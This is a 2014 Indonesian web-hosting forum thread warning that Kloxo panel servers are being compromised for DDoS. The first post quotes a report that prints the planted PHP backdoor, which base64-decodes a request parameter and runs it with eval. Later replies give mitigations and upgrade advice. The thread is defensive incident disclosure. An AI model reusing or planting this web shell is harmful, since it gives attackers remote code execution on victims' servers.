Kloxo installations compromised

Discussion in 'Masalah Teknik dan Keamanan' started by FluidaWeb, 29 Jan 2014.

Thread Status:
Not open for further replies.
  1. FluidaWeb

    FluidaWeb Expert 1.0

    Messages:
    644
    Likes Received:
    85
    Trophy Points:
    28
    Info bagi para pemakai kloxo dan vps provider, jika kloxo banyak compromised yg digunakan untuk DDOS, saya baca bnyak VPS provider melakukan suspend massal krn hal ini. Jadi silahkan di cek bagi para VPS provider mungkin secara diam2 servernya melakukan DDOS
    Saya tidak tahu apa ini juga ada padaKloxo MR

    Ini info dr forum luar yg lagi rame:

    We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

    Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

    UPDATE: default.php in the same directory will also be compromised. See source here:http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

    This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):
    Code:
    <?php > set_time_limit(0);error_reporting(NULL); > if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));} > else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';} > ?>
    Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

    All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

    Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!
     
  2. voezie

    voezie Hosting Guru

    Messages:
    1,771
    Likes Received:
    212
    Trophy Points:
    63
    Solusi sementara bagi pengguna kloxo:

    1. Disable akses login ke kloxo dan disable auto update kloxo
    2. Disable akses / blok ip 178.248.23.0/24 di firewall / iptables
     
  3. mustafaramadhan

    mustafaramadhan Hosting Guru

    Messages:
    3,237
    Likes Received:
    857
    Trophy Points:
    113
    Ingat, hal ini terjadi pada Kloxo official bahkan pada versi terakhir (6.1.12) sedangkan Kloxo-MR (6.5.0/6.5.1) sudah menambal masalah ini.
     
  4. mustafaramadhan

    mustafaramadhan Hosting Guru

    Messages:
    3,237
    Likes Received:
    857
    Trophy Points:
    113
    Sudah banyak provider yang confirm bahwa pemakai Kloxo official bisa update ke Kloxo-MR. Mereka menyampaikan 'Kloxo-MR is fine'.
     
  5. ainuloke

    ainuloke Beginner 2.0

    Messages:
    44
    Likes Received:
    0
    Trophy Points:
    6
    iya punya saya disable...
     
  6. Konx

    Konx Beginner 1.0

    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Kalo Kloxo Official upgrade ke Kloxo-MR apakah file web dan mysql nya musti di backup.. atau tidak usah yah?
     
  7. mustafaramadhan

    mustafaramadhan Hosting Guru

    Messages:
    3,237
    Likes Received:
    857
    Trophy Points:
    113
    Selalu backup. Memang Kloxo-MR didesain utk tidak 'merusak' data yang anda, bahkan bilamana anda reinstall Kloxo-MR.
     
    BikinDesainSitus likes this.
  8. xphones

    xphones Expert 1.0

    Messages:
    745
    Likes Received:
    41
    Trophy Points:
    28
    Setelah sekian lama seperti hidup segan mati tak mau, akhirnya Kloxo official merilis versi 6.1.13 tujuannya untuk menutup security issue ini. Pelopornya = Danny

    Sedang KloxoMR juga masih rajin update sampai hari ini. Pelopornya = Mustafaramadhan.


    Silahkan dipilih mau pakai yang mana..?? :D
     
  9. FluidaWeb

    FluidaWeb Expert 1.0

    Messages:
    644
    Likes Received:
    85
    Trophy Points:
    28
    akan menjadi kerja keras bagi para developer kloxo maupun kloxo MR, krn sepertinya tidak mungkin menutup semua bug yg banyak hanya dalam seminggu, sebulan atau dua bulan
     
  10. syarwin

    syarwin Poster 2.0

    Messages:
    122
    Likes Received:
    16
    Trophy Points:
    18
    Salut. Yang penting tetap semangat. Tidak ada sistem yang sempurna, namun jika rajin update maka Kloxo-MR akan dikenal dan banyak digunakan.:41:
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...